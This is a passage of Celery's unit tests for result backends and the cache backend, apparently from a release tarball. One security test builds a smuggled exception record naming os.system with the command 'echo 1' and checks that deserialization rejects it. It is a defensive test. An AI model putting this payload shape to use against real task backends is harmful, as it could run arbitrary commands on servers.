self.app.amqp.router.route.call_args[0][1] == body.name called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs["queue"] == "routing_queue" self.b.apply_chord(header_result_args, body.set(queue='test_queue')) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue' @self.app.task(shared=False, queue='test_queue_two') def callback_queue(result): pass self.b.apply_chord(header_result_args, callback_queue.s()) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue_two' with self.Celery() as app2: @app2.task(name='callback_different_app', shared=False) def callback_different_app(result): pass callback_different_app_signature = self.app.signature('callback_different_app') self.b.apply_chord(header_result_args, callback_different_app_signature) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'routing_queue' callback_different_app_signature.set(queue='test_queue_three') self.b.apply_chord(header_result_args, callback_different_app_signature) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue_three' class test_exception_pickle: def test_BaseException(self): assert fnpe(Exception()) is None def test_get_pickleable_exception(self): exc = Exception('foo') assert gpe(exc) == exc def test_unpickleable(self): assert isinstance(fnpe(Unpickleable()), KeyError) assert fnpe(Impossible()) is None class test_prepare_exception: def setup(self): self.b = BaseBackend(self.app) def test_unpickleable(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(Unpickleable(1, 2, 'foo')) assert isinstance(x, KeyError) y = self.b.exception_to_python(x) assert isinstance(y, KeyError) def test_json_exception_arguments(self): self.b.serializer = 'json' x = self.b.prepare_exception(Exception(object)) assert x == { 'exc_message': serialization.ensure_serializable( (object,), self.b.encode), 'exc_type': Exception.__name__, 'exc_module': Exception.__module__} y = self.b.exception_to_python(x) assert isinstance(y, Exception) def test_json_exception_nested(self): self.b.serializer = 'json' x = self.b.prepare_exception(objectexception.Nested('msg')) assert x == { 'exc_message': ('msg',), 'exc_type': 'objectexception.Nested', 'exc_module': objectexception.Nested.__module__} y = self.b.exception_to_python(x) assert isinstance(y, objectexception.Nested) def test_impossible(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(Impossible()) assert isinstance(x, UnpickleableExceptionWrapper) assert str(x) y = self.b.exception_to_python(x) assert y.__class__.__name__ == 'Impossible' assert y.__class__.__module__ == 'foo.module' def test_regular(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(KeyError('baz')) assert isinstance(x, KeyError) y = self.b.exception_to_python(x) assert isinstance(y, KeyError) def test_unicode_message(self): message = '\u03ac' x = self.b.prepare_exception(Exception(message)) assert x == {'exc_message': (message,), 'exc_type': Exception.__name__, 'exc_module': Exception.__module__} class KVBackend(KeyValueStoreBackend): mget_returns_dict = False def __init__(self, app, *args, **kwargs): self.db = {} super().__init__(app, *args, **kwargs) def get(self, key): return self.db.get(key) def _set_with_state(self, key, value, state): self.db[key] = value def mget(self, keys): if self.mget_returns_dict: return {key: self.get(key) for key in keys} else: return [self.get(k) for k in keys] def delete(self, key): self.db.pop(key, None) class DictBackend(BaseBackend): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._data = {'can-delete': {'result': 'foo'}} def _restore_group(self, group_id): if group_id == 'exists': return {'result': 'group'} def _get_task_meta_for(self, task_id): if task_id == 'task-exists': return {'result': 'task'} def _delete_group(self, group_id): self._data.pop(group_id, None) class test_BaseBackend_dict: def setup(self): self.b = DictBackend(app=self.app) @self.app.task(shared=False, bind=True) def bound_errback(self, result): pass @self.app.task(shared=False) def errback(arg1, arg2): errback.last_result = arg1 + arg2 self.bound_errback = bound_errback self.errback = errback def test_delete_group(self): self.b.delete_group('can-delete') assert 'can-delete' not in self.b._data def test_prepare_exception_json(self): x = DictBackend(self.app, serializer='json') e = x.prepare_exception(KeyError('foo')) assert 'exc_type' in e e = x.exception_to_python(e) assert e.__class__.__name__ == 'KeyError' assert str(e).strip('u') == "'foo'" def test_save_group(self): b = BaseBackend(self.app) b._save_group = Mock() b.save_group('foofoo', 'xxx') b._save_group.assert_called_with('foofoo', 'xxx') def test_add_to_chord_interface(self): b = BaseBackend(self.app) with pytest.raises(NotImplementedError): b.add_to_chord('group_id', 'sig') def test_forget_interface(self): b = BaseBackend(self.app) with pytest.raises(NotImplementedError): b.forget('foo') def test_restore_group(self): assert self.b.restore_group('missing') is None assert self.b.restore_group('missing') is None assert self.b.restore_group('exists') == 'group' assert self.b.restore_group('exists') == 'group' assert self.b.restore_group('exists', cache=False) == 'group' def test_reload_group_result(self): self.b._cache = {} self.b.reload_group_result('exists') self.b._cache['exists'] = {'result': 'group'} def test_reload_task_result(self): self.b._cache = {} self.b.reload_task_result('task-exists') self.b._cache['task-exists'] = {'result': 'task'} def test_fail_from_current_stack(self): import inspect self.b.mark_as_failure = Mock() frame_list = [] def raise_dummy(): frame_str_temp = str(inspect.currentframe().__repr__) frame_list.append(frame_str_temp) raise KeyError('foo') try: raise_dummy() except KeyError as exc: self.b.fail_from_current_stack('task_id') self.b.mark_as_failure.assert_called() args = self.b.mark_as_failure.call_args[0] assert args[0] == 'task_id' assert args[1] is exc assert args[2] tb_ = exc.__traceback__ while tb_ is not None: if str(tb_.tb_frame.__repr__) == frame_list[0]: assert len(tb_.tb_frame.f_locals) == 0 tb_ = tb_.tb_next def test_prepare_value_serializes_group_result(self): self.b.serializer = 'json' g = self.app.GroupResult('group_id', [self.app.AsyncResult('foo')]) v = self.b.prepare_value(g) assert isinstance(v, (list, tuple)) assert result_from_tuple(v, app=self.app) == g v2 = self.b.prepare_value(g[0]) assert isinstance(v2, (list, tuple)) assert result_from_tuple(v2, app=self.app) == g[0] self.b.serializer = 'pickle' assert isinstance(self.b.prepare_value(g), self.app.GroupResult) def test_is_cached(self): b = BaseBackend(app=self.app, max_cached_results=1) b._cache['foo'] = 1 assert b.is_cached('foo') assert not b.is_cached('false') def test_mark_as_done__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') b.on_chord_part_return = Mock() b.mark_as_done('id', 10, request=request) b.on_chord_part_return.assert_called_with(request, states.SUCCESS, 10) def test_mark_as_failure__bound_errback_eager(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.delivery_info = { 'is_eager': True } request.errbacks = [ self.bound_errback.subtask(args=[1], immutable=True)] exc = KeyError() group = self.patching('celery.backends.base.group') b.mark_as_failure('id', exc, request=request) group.assert_called_with(request.errbacks, app=self.app) group.return_value.apply.assert_called_with( (request.id, ), parent_id=request.id, root_id=request.root_id) def test_mark_as_failure__bound_errback(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.delivery_info = {} request.errbacks = [ self.bound_errback.subtask(args=[1], immutable=True)] exc = KeyError() group = self.patching('celery.backends.base.group') b.mark_as_failure('id', exc, request=request) group.assert_called_with(request.errbacks, app=self.app) group.return_value.apply_async.assert_called_with( (request.id, ), parent_id=request.id, root_id=request.root_id) def test_mark_as_failure__errback(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [self.errback.subtask(args=[2, 3], immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) assert self.errback.last_result == 5 @patch('celery.backends.base.group') def test_class_based_task_can_be_used_as_error_callback(self, mock_group): b = BaseBackend(app=self.app) b._store_result = Mock() class TaskBasedClass(Task): def run(self): pass TaskBasedClass = self.app.register_task(TaskBasedClass()) request = Mock(name='request') request.errbacks = [TaskBasedClass.subtask(args=[], immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) mock_group.assert_called_once_with(request.errbacks, app=self.app) @patch('celery.backends.base.group') def test_unregistered_task_can_be_used_as_error_callback(self, mock_group): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [signature('doesnotexist', immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) mock_group.assert_called_once_with(request.errbacks, app=self.app) def test_mark_as_failure__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [] b.on_chord_part_return = Mock() exc = KeyError() b.mark_as_failure('id', exc, request=request) b.on_chord_part_return.assert_called_with(request, states.FAILURE, exc) def test_mark_as_revoked__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [] b.on_chord_part_return = Mock() b.mark_as_revoked('id', 'revoked', request=request) b.on_chord_part_return.assert_called_with(request, states.REVOKED, ANY) def test_chord_error_from_stack_raises(self): class ExpectedException(Exception): pass b = BaseBackend(app=self.app) callback = MagicMock(name='callback') callback.options = {'link_error': []} callback.keys.return_value = [] task = self.app.tasks[callback.task] = Mock() b.fail_from_current_stack = Mock() self.patching('celery.group') with patch.object( b, "_call_task_errbacks", side_effect=ExpectedException() ) as mock_call_errbacks: b.chord_error_from_stack(callback, exc=ValueError()) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=mock_call_errbacks.side_effect, ) def test_exception_to_python_when_None(self): b = BaseBackend(app=self.app) assert b.exception_to_python(None) is None def test_not_an_actual_exc_info(self): pass def test_not_an_exception_but_a_callable(self): x = { 'exc_message': ('echo 1',), 'exc_type': 'system', 'exc_module': 'os' } with pytest.raises(SecurityError, match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")): self.b.exception_to_python(x) def test_not_an_exception_but_another_object(self): x = { 'exc_message': (), 'exc_type': 'object', 'exc_module': 'builtins' } with pytest.raises(SecurityError, match=re.escape(r"Expected an exception class, got builtins.object with payload ()")): self.b.exception_to_python(x) def test_exception_to_python_when_attribute_exception(self): b = BaseBackend(app=self.app) test_exception = {'exc_type': 'AttributeDoesNotExist', 'exc_module': 'celery', 'exc_message': ['Raise Custom Message']} result_exc = b.exception_to_python(test_exception) assert str(result_exc) == 'Raise Custom Message' def test_exception_to_python_when_type_error(self): b = BaseBackend(app=self.app) celery.TestParamException = paramexception test_exception = {'exc_type': 'TestParamException', 'exc_module': 'celery', 'exc_message': []} result_exc = b.exception_to_python(test_exception) del celery.TestParamException assert str(result_exc) == "([])" def test_wait_for__on_interval(self): self.patching('time.sleep') b = BaseBackend(app=self.app) b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = {'status': states.PENDING} callback = Mock(name='callback') with pytest.raises(TimeoutError): b.wait_for(task_id='1', on_interval=callback, timeout=1) callback.assert_called_with() b._get_task_meta_for.return_value = {'status': states.SUCCESS} b.wait_for(task_id='1', timeout=None) def test_get_children(self): b = BaseBackend(app=self.app) b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = {} assert b.get_children('id') is None b._get_task_meta_for.return_value = {'children': 3} assert b.get_children('id') == 3 class test_KeyValueStoreBackend: def setup(self): self.b = KVBackend(app=self.app) def test_on_chord_part_return(self): assert not self.b.implements_incr self.b.on_chord_part_return(None, None, None) def test_get_store_delete_result(self): tid = uuid() self.b.mark_as_done(tid, 'Hello world') assert self.b.get_result(tid) == 'Hello world' assert self.b.get_state(tid) == states.SUCCESS self.b.forget(tid) assert self.b.get_state(tid) == states.PENDING @pytest.mark.parametrize('serializer', ['json', 'pickle', 'yaml', 'msgpack']) def test_store_result_parent_id(self, serializer): self.app.conf.accept_content = ('json', serializer) self.b = KVBackend(app=self.app, serializer=serializer) tid = uuid() pid = uuid() state = 'SUCCESS' result = 10 request = Context(parent_id=pid) self.b.store_result( tid, state=state, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert stored_meta['parent_id'] == request.parent_id def test_store_result_group_id(self): tid = uuid() state = 'SUCCESS' result = 10 request = Context(group='gid', children=[]) self.b.store_result( tid, state=state, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert stored_meta['group_id'] == request.group def test_store_result_race_second_write_should_ignore_if_previous_success(self): tid = uuid() state = 'SUCCESS' result = 10 request = Context(group='gid', children=[]) self.b.store_result( tid, state=state, result=result, request=request, ) self.b.store_result( tid, state=states.FAILURE, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert stored_meta['status'] == states.SUCCESS def test_strip_prefix(self): x = self.b.get_key_for_task('x1b34') assert self.b._strip_prefix(x) == 'x1b34' assert self.b._strip_prefix('x1b34') == 'x1b34' def test_get_many(self): for is_dict in True, False: self.b.mget_returns_dict = is_dict ids = {uuid(): i for i in range(10)} for id, i in ids.items(): self.b.mark_as_done(id, i) it = self.b.get_many(list(ids), interval=0.01) for i, (got_id, got_state) in enumerate(it): assert got_state['result'] == ids[got_id] assert i == 9 assert list(self.b.get_many(list(ids), interval=0.01)) self.b._cache.clear() callback = Mock(name='callback') it = self.b.get_many( list(ids), on_message=callback, interval=0.05 ) for i, (got_id, got_state) in enumerate(it): assert got_state['result'] == ids[got_id] assert i == 9 assert list( self.b.get_many(list(ids), interval=0.01) ) callback.assert_has_calls([ call(ANY) for id in ids ]) def test_get_many_times_out(self): tasks = [uuid() for _ in range(4)] self.b._cache[tasks[1]] = {'status': 'PENDING'} with pytest.raises(self.b.TimeoutError): list(self.b.get_many(tasks, timeout=0.01, interval=0.01)) def test_get_many_passes_ready_states(self): tasks_length = 10 ready_states = frozenset({states.SUCCESS}) self.b._cache.clear() ids = {uuid(): i for i in range(tasks_length)} for id, i in ids.items(): if i % 2 == 0: self.b.mark_as_done(id, i) else: self.b.mark_as_failure(id, Exception()) it = self.b.get_many(list(ids), interval=0.01, max_iterations=1, READY_STATES=ready_states) it_list = list(it) assert all([got_state['status'] in ready_states for (got_id, got_state) in it_list]) assert len(it_list) == tasks_length / 2 def test_chord_part_return_no_gid(self): self.b.implements_incr = True task = Mock() state = 'SUCCESS' result = 10 task.request.group = None self.b.get_key_for_chord = Mock() self.b.get_key_for_chord.side_effect = AssertionError( 'should not get here', ) assert self.b.on_chord_part_return( task.request, state, result) is None @patch('celery.backends.base.GroupResult') @patch('celery.backends.base.maybe_signature') def test_chord_part_return_restore_raises(self, maybe_signature, GroupResult): self.b.implements_incr = True GroupResult.restore.side_effect = KeyError() self.b.chord_error_from_stack = Mock() callback = Mock(name='callback') request = Mock(name='request') request.group = 'gid' maybe_signature.return_value = callback self.b.on_chord_part_return(request, states.SUCCESS, 10) self.b.chord_error_from_stack.assert_called_with( callback, ANY, ) @patch('celery.backends.base.GroupResult') @patch('celery.backends.base.maybe_signature') def test_chord_part_return_restore_empty(self, maybe_signature, GroupResult): self.b.implements_incr = True GroupResult.restore.return_value = None self.b.chord_error_from_stack = Mock() callback = Mock(name='callback') request = Mock(name='request') request.group = 'gid' maybe_signature.return_value = callback self.b.on_chord_part_return(request, states.SUCCESS, 10) self.b.chord_error_from_stack.assert_called_with( callback, ANY, ) def test_filter_ready(self): self.b.decode_result = Mock() self.b.decode_result.side_effect = pass1 assert len(list(self.b._filter_ready([ (1, {'status': states.RETRY}), (2, {'status': states.FAILURE}), (3, {'status': states.SUCCESS}), ]))) == 2 @contextmanager def _chord_part_context(self, b): @self.app.task(shared=False) def callback(result): pass b.implements_incr = True b.client = Mock() with patch('celery.backends.base.GroupResult') as GR: deps = GR.restore.return_value = Mock(name='DEPS') deps.__len__ = Mock() deps.__len__.return_value = 10 b.incr = Mock() b.incr.return_value = 10 b.expire = Mock() task = Mock() task.request.group = 'grid' cb = task.request.chord = callback.s() task.request.chord.freeze() callback.backend = b callback.backend.fail_from_current_stack = Mock() yield task, deps, cb def test_chord_part_return_timeout(self): with self._chord_part_context(self.b) as (task, deps, _): try: self.app.conf.result_chord_join_timeout += 1.0 self.b.on_chord_part_return(task.request, 'SUCCESS', 10) finally: self.app.conf.result_chord_join_timeout -= 1.0 self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=4.0) def test_chord_part_return_propagate_set(self): with self._chord_part_context(self.b) as (task, deps, _): self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=3.0) def test_chord_part_return_propagate_default(self): with self._chord_part_context(self.b) as (task, deps, _): self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=3.0) def test_chord_part_return_join_raises_internal(self): with self._chord_part_context(self.b) as (task, deps, callback): deps._failed_join_report = lambda: iter([]) deps.join_native.side_effect = KeyError('foo') self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.fail_from_current_stack.assert_called() args = self.b.fail_from_current_stack.call_args exc = args[1]['exc'] assert isinstance(exc, ChordError) assert 'foo' in str(exc) def test_chord_part_return_join_raises_task(self): b = KVBackend(serializer='pickle', app=self.app) with self._chord_part_context(b) as (task, deps, callback): deps._failed_join_report = lambda: iter([ self.app.AsyncResult('culprit'), ]) deps.join_native.side_effect = KeyError('foo') b.on_chord_part_return(task.request, 'SUCCESS', 10) b.fail_from_current_stack.assert_called() args = b.fail_from_current_stack.call_args exc = args[1]['exc'] assert isinstance(exc, ChordError) assert 'Dependency culprit raised' in str(exc) def test_restore_group_from_json(self): b = KVBackend(serializer='json', app=self.app) g = self.app.GroupResult( 'group_id', [self.app.AsyncResult('a'), self.app.AsyncResult('b')], ) b._save_group(g.id, g) g2 = b._restore_group(g.id)['result'] assert g2 == g def test_restore_group_from_pickle(self): b = KVBackend(serializer='pickle', app=self.app) g = self.app.GroupResult( 'group_id', [self.app.AsyncResult('a'), self.app.AsyncResult('b')], ) b._save_group(g.id, g) g2 = b._restore_group(g.id)['result'] assert g2 == g def test_chord_apply_fallback(self): self.b.implements_incr = False self.b.fallback_chord_unlock = Mock() header_result_args = ( 'group_id', [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord( header_result_args, 'body', foo=1, ) self.b.fallback_chord_unlock.assert_called_with( self.app.GroupResult(*header_result_args), 'body', foo=1, ) def test_get_missing_meta(self): assert self.b.get_result('xxx-missing') is None assert self.b.get_state('xxx-missing') == states.PENDING def test_save_restore_delete_group(self): tid = uuid() tsr = self.app.GroupResult( tid, [self.app.AsyncResult(uuid()) for _ in range(10)], ) self.b.save_group(tid, tsr) self.b.restore_group(tid) assert self.b.restore_group(tid) == tsr self.b.delete_group(tid) assert self.b.restore_group(tid) is None def test_restore_missing_group(self): assert self.b.restore_group('xxx-nonexistant') is None class test_KeyValueStoreBackend_interface: def test_get(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).get('a') def test_set(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app)._set_with_state('a', 1, states.SUCCESS) def test_incr(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).incr('a') def test_cleanup(self): assert not KeyValueStoreBackend(self.app).cleanup() def test_delete(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).delete('a') def test_mget(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).mget(['a']) def test_forget(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).forget('a') class test_DisabledBackend: def test_store_result(self): DisabledBackend(self.app).store_result() def test_is_disabled(self): with pytest.raises(NotImplementedError): DisabledBackend(self.app).get_state('foo') def test_as_uri(self): assert DisabledBackend(self.app).as_uri() == 'disabled://' @pytest.mark.celery(result_backend='disabled') def test_chord_raises_error(self): with pytest.raises(NotImplementedError): chord(self.add.s(i, i) for i in range(10))(self.add.s([2])) @pytest.mark.celery(result_backend='disabled') def test_chain_with_chord_raises_error(self): with pytest.raises(NotImplementedError): (self.add.s(2, 2) | group(self.add.s(2, 2), self.add.s(5, 6)) | self.add.s()).delay() class test_as_uri: def setup(self): self.b = BaseBackend( app=self.app, url='sch://uuuu:pwpw@hostname.dom' ) def test_as_uri_include_password(self): assert self.b.as_uri(True) == self.b.url def test_as_uri_exclude_password(self): assert self.b.as_uri() == 'sch://uuuu:**@hostname.dom/' class test_backend_retries: def test_should_retry_exception(self): assert not BaseBackend(app=self.app).exception_safe_to_retry(Exception("test")) def test_get_failed_never_retries(self): self.app.conf.result_backend_always_retry, prev = False, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ expected_exc, {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_get_with_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ Exception("failed"), {'status': states.SUCCESS, 'result': 42} ] res = b.get_task_meta(sentinel.task_id) assert res == {'status': states.SUCCESS, 'result': 42} assert b._sleep.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev def test_get_reaching_max_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry self.app.conf.result_backend_max_retries, prev_max_retries = 0, self.app.conf.result_backend_max_retries try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ Exception("failed"), {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except BackendGetMetaError: assert b._sleep.call_count == 0 finally: self.app.conf.result_backend_always_retry = prev self.app.conf.result_backend_max_retries = prev_max_retries def test_get_unsafe_exception(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ expected_exc, {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_store_result_never_retries(self): self.app.conf.result_backend_always_retry, prev = False, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], "exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ expected_exc, 42 ] try: b.store_result(sentinel.task_id, 42, states.SUCCESS) except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_store_result_with_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], "exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ Exception("failed"), 42 ] res = b.store_result(sentinel.task_id, 42, states.SUCCESS) assert res == 42 assert b._sleep.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev def test_store_result_reaching_max_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry self.app.conf.result_backend_max_retries, prev_max_retries = 0, self.app.conf.result_backend_max_retries try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], "exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ Exception("failed"), 42 ] try: b.store_result(sentinel.task_id, 42, states.SUCCESS) assert False except BackendStoreError: assert b._sleep.call_count == 0 finally: self.app.conf.result_backend_always_retry = prev self.app.conf.result_backend_max_retries = prev_max_retries ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_cache.py0000664000175000017500000002410100000000000020343 0ustar00asifasif00000000000000import sys import types from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from kombu.utils.encoding import ensure_bytes, str_to_bytes from celery import signature, states, uuid from celery.backends.cache import CacheBackend, DummyClient, backends from celery.exceptions import ImproperlyConfigured from t.unit import conftest class SomeClass: def __init__(self, data): self.data = data class test_CacheBackend: def setup(self): self.app.conf.result_serializer = 'pickle' self.tb = CacheBackend(backend='memory://', app=self.app) self.tid = uuid() self.old_get_best_memcached = backends['memcache'] backends['memcache'] = lambda: (DummyClient, ensure_bytes) def teardown(self): backends['memcache'] = self.old_get_best_memcached def test_no_backend(self): self.app.conf.cache_backend = None with pytest.raises(ImproperlyConfigured): CacheBackend(backend=None, app=self.app) def test_memory_client_is_shared(self): """This test verifies that memory:// backend state is shared over multiple threads""" from threading import Thread t = Thread( target=lambda: CacheBackend(backend='memory://', app=self.app).set('test', 12345) ) t.start() t.join() assert self.tb.client.get('test') == 12345 def test_mark_as_done(self): assert self.tb.get_state(self.tid) == states.PENDING assert self.tb.get_result(self.tid) is None self.tb.mark_as_done(self.tid, 42) assert self.tb.get_state(self.tid) == states.SUCCESS assert self.tb.get_result(self.tid) == 42 def test_is_pickled(self): result = {'foo': 'baz', 'bar': SomeClass(12345)} self.tb.mark_as_done(self.tid, result) # is serialized properly. rindb = self.tb.get_result(self.tid) assert rindb.get('foo') == 'baz' assert rindb.get('bar').data == 12345 def test_mark_as_failure(self): try: raise KeyError('foo') except KeyError as exception: self.tb.mark_as_failure(self.tid, exception) assert self.tb.get_state(self.tid) == states.FAILURE assert isinstance(self.tb.get_result(self.tid), KeyError) def test_apply_chord(self): tb = CacheBackend(backend='memory://', app=self.app) result_args = ( uuid(), [self.app.AsyncResult(uuid()) for _ in range(3)], ) tb.apply_chord(result_args, None) assert self.app.GroupResult.restore(result_args[0], backend=tb) == self.app.GroupResult(*result_args) @patch('celery.result.GroupResult.restore') def test_on_chord_part_return(self, restore): tb = CacheBackend(backend='memory://', app=self.app) deps = Mock() deps.__len__ = Mock() deps.__len__.return_value = 2 restore.return_value = deps task = Mock() task.name = 'foobarbaz' self.app.tasks['foobarbaz'] = task task.request.chord = signature(task) result_args = ( uuid(), [self.app.AsyncResult(uuid()) for _ in range(3)], ) task.request.group = result_args[0] tb.apply_chord(result_args, None) deps.join_native.assert_not_called() tb.on_chord_part_return(task.request, 'SUCCESS', 10) deps.join_native.assert_not_called() tb.on_chord_part_return(task.request, 'SUCCESS', 10) deps.join_native.assert_called_with(propagate=True, timeout=3.0) deps.delete.assert_called_with() def test_mget(self): self.tb._set_with_state('foo', 1, states.SUCCESS) self.tb._set_with_state('bar', 2, states.SUCCESS) assert self.tb.mget(['foo', 'bar']) == {'foo': 1, 'bar': 2} def test_forget(self): self.tb.mark_as_done(self.tid, {'foo': 'bar'}) x = self.app.AsyncResult(self.tid, backend=self.tb) x.forget() assert x.result is None def test_process_cleanup(self): self.tb.process_cleanup() def test_expires_as_int(self): tb = CacheBackend(backend='memory://', expires=10, app=self.app) assert tb.expires == 10 def test_unknown_backend_raises_ImproperlyConfigured(self): with pytest.raises(ImproperlyConfigured): CacheBackend(backend='unknown://', app=self.app) def test_as_uri_no_servers(self): assert self.tb.as_uri() == 'memory:///' def test_as_uri_one_server(self): backend = 'memcache://127.0.0.1:11211/' b = CacheBackend(backend=backend, app=self.app) assert b.as_uri() == backend def test_as_uri_multiple_servers(self): backend = 'memcache://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/' b = CacheBackend(backend=backend, app=self.app) assert b.as_uri() == backend def test_regression_worker_startup_info(self): pytest.importorskip('memcached') self.app.conf.result_backend = ( 'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/' ) worker = self.app.Worker() with conftest.stdouts(): worker.on_start() assert worker.startup_info() class MyMemcachedStringEncodingError(Exception): pass class MemcachedClient(DummyClient): def set(self, key, value, *args, **kwargs): key_t, must_be, not_be, cod = bytes, 'string', 'bytes', 'decode' if isinstance(key, key_t): raise MyMemcachedStringEncodingError( f'Keys must be {must_be}, not {not_be}. Convert your ' f'strings using mystring.{cod}(charset)!') return super().set(key, value, *args, **kwargs) class MockCacheMixin: @contextmanager def mock_memcache(self): memcache = types.ModuleType('memcache') memcache.Client = MemcachedClient memcache.Client.__module__ = memcache.__name__ prev, sys.modules['memcache'] = sys.modules.get('memcache'), memcache try: yield True finally: if prev is not None: sys.modules['memcache'] = prev @contextmanager def mock_pylibmc(self): pylibmc = types.ModuleType('pylibmc') pylibmc.Client = MemcachedClient pylibmc.Client.__module__ = pylibmc.__name__ prev = sys.modules.get('pylibmc') sys.modules['pylibmc'] = pylibmc try: yield True finally: if prev is not None: sys.modules['pylibmc'] = prev class test_get_best_memcache(MockCacheMixin): def test_pylibmc(self): with self.mock_pylibmc(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] assert cache.get_best_memcache()[0].__module__ == 'pylibmc' @pytest.mark.masked_modules('pylibmc') def test_memcache(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] assert (cache.get_best_memcache()[0]().__module__ == 'memcache') @pytest.mark.masked_modules('pylibmc', 'memcache') def test_no_implementations(self, mask_modules): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] with pytest.raises(ImproperlyConfigured): cache.get_best_memcache() def test_cached(self): with self.mock_pylibmc(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] cache.get_best_memcache()[0](behaviors={'foo': 'bar'}) assert cache._imp[0] cache.get_best_memcache()[0]() def test_backends(self): from celery.backends.cache import backends with 